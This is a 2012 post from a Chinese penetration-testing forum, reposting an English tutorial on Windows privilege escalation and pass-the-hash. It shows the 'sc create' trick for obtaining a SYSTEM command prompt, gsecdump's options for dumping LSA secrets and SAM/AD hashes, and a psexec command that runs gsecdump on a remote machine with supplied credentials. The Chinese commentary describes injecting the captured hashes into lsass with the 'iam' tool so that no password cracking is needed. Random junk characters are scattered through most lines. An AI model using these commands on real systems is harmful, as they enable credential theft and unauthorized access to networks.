中国网络渗透测试联盟

标题: HASH注入式攻击 [打印本页]

作者: admin    时间: 2012-11-6 21:09
标题: HASH注入式攻击
o get a DOS Prompt as NT system:* J0 k7 h  T5 @2 d! N- S, v3 {

$ x% F# z5 C, t' r# Z8 f# aC:\>sc create shellcmdline binpath= "C:\WINDOWS\system32\cmd.exe /K start" type= own type= interact4 j& t  P- }2 b
[SC] CreateService SUCCESS
7 e9 B0 T' c6 N; j! S" d* b0 O6 _  A& j5 X4 J7 c' E
C:\>sc start shellcmdline" y- q5 E6 X0 |
[SC] StartService FAILED 1053:
  P& e+ G+ H. F! W/ ?3 n6 N" v1 v& H" h
The service did not respond to the start or control request in a timely fashion.
2 e6 {' d$ W6 I* X, \* Y  H4 _
+ \" N6 J$ @7 M$ k7 I) xC:\>sc delete shellcmdline2 n% _0 |+ y7 L! n
[SC] DeleteService SUCCESS1 c0 X. R- J4 a+ H
0 w) k' {9 M$ N7 |" Y; Y) p6 u
------------5 `& y: S, J, P4 b; C/ J
+ a3 F/ {, }- C
Then in the new DOS window:
3 v2 w8 p) V  b, t- x0 |, D7 G
" @' ?+ |% ^5 @6 OMicrosoft Windows XP [Version 5.1.2600]+ C. y4 ?) X, O7 }' ~! L
(C) Copyright 1985-2001 Microsoft Corp.
" K1 ~7 C+ Y; I! w9 R$ ?# z
5 M: |* N4 D; X: A' J( yC:\WINDOWS\system32>whoami
' @6 T% ~* Z6 k' T  W: W7 eNT AUTHORITY\SYSTEM* V$ C/ e8 @6 o& g0 O

: ]# H7 H4 R5 V" {+ s+ BC:\WINDOWS\system32>gsecdump -h
+ e1 y2 c) u  O" W* Rgsecdump v0.6 by Johannes Gumbel (链接标记johannes.gumbel@truesec.se)
, @/ g' u, L8 m( p9 \! M5 rusage: gsecdump [options]
( M5 l3 M- R& T$ M$ j
# J7 o, a2 _+ e6 ~  Goptions:0 a/ t. @7 `0 a2 \
-h [ --help ] show help
+ @2 K/ j# G; v+ C2 d, O-a [ --dump_all ] dump all secrets: W. G2 i/ t9 {0 z
-l [ --dump_lsa ] dump lsa secrets; y  ~$ H* E6 L5 X6 x
-w [ --dump_wireless ] dump microsoft wireless connections/ Y1 V: J) e: @8 ^
-u [ --dump_usedhashes ] dump hashes from active logon sessions
) T, z0 f" k# n: v- k! z# p1 U-s [ --dump_hashes ] dump hashes from SAM/AD- t6 `' Z7 {; O3 ]% ~- R: w
  ]0 _! x0 m* u# R& d
Although I like to use:
2 u7 [$ w. F5 e6 {: L
. C/ Y" D: W. x* G, XPsExec v1.83 - Execute processes remotely
- v# e; O  ^( TCopyright (C) 2001-2007 Mark Russinovich5 ?% z8 V8 N4 O: d
Sysinternals - 链接标记[url]www.sysinternals.com[/url]
0 P2 M* k7 D6 c( L* y! h" Q: q7 j, W+ B) d3 }; ]
C:\>psexec \\COMPUTER -u user -p password -s -f -c gsecdump.exe -u >Active-HASH.TXT
8 t! n. z3 T+ L5 w4 y+ C0 g8 u: s( X: C" e' q4 t% b) @* z2 B
to get the hashes from active logon sessions of a remote system.
5 w8 [5 }. g$ p- i. V- N
6 X# l; I( c6 ?" D" P9 k" F& EThese are a lot better than getting a cachedump of the Cached Credentials because these hashes are LMHashes that can be easily broken with Rainbow Tables.
4 ^) _6 l, Z% X; q6 m; y
* _9 x4 g5 N- S6 x* w7 u1 \提示一下,可以使用pshtools工具包中的iam,把刚才使用gsecdump抓取出来HASH信息导入本地的lsass进程,来实现hash注入式攻击,还是老外厉害,这下管理员有得忙了,ARP欺骗的时候获得的LM/NThash,还有gethash获得的,其实根本不用破解密码,这个就是利用工具了,原文说的好,不管密码是设置4位还是127位,只要有了hash,100%就能搞定了.% }9 ]' X% G/ J7 ^# H4 p/ D
原文出处:链接标记[url]http://truesecurity.se/blogs/mur ... -text-password.aspx[/url]
' \7 c. z) S: W2 V3 j/ ^# x1 A: g6 D- E1 J
我看了下原文出处,貌似是/2007/03/16/郁闷啊,差距。
" a& z1 l7 k# M




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2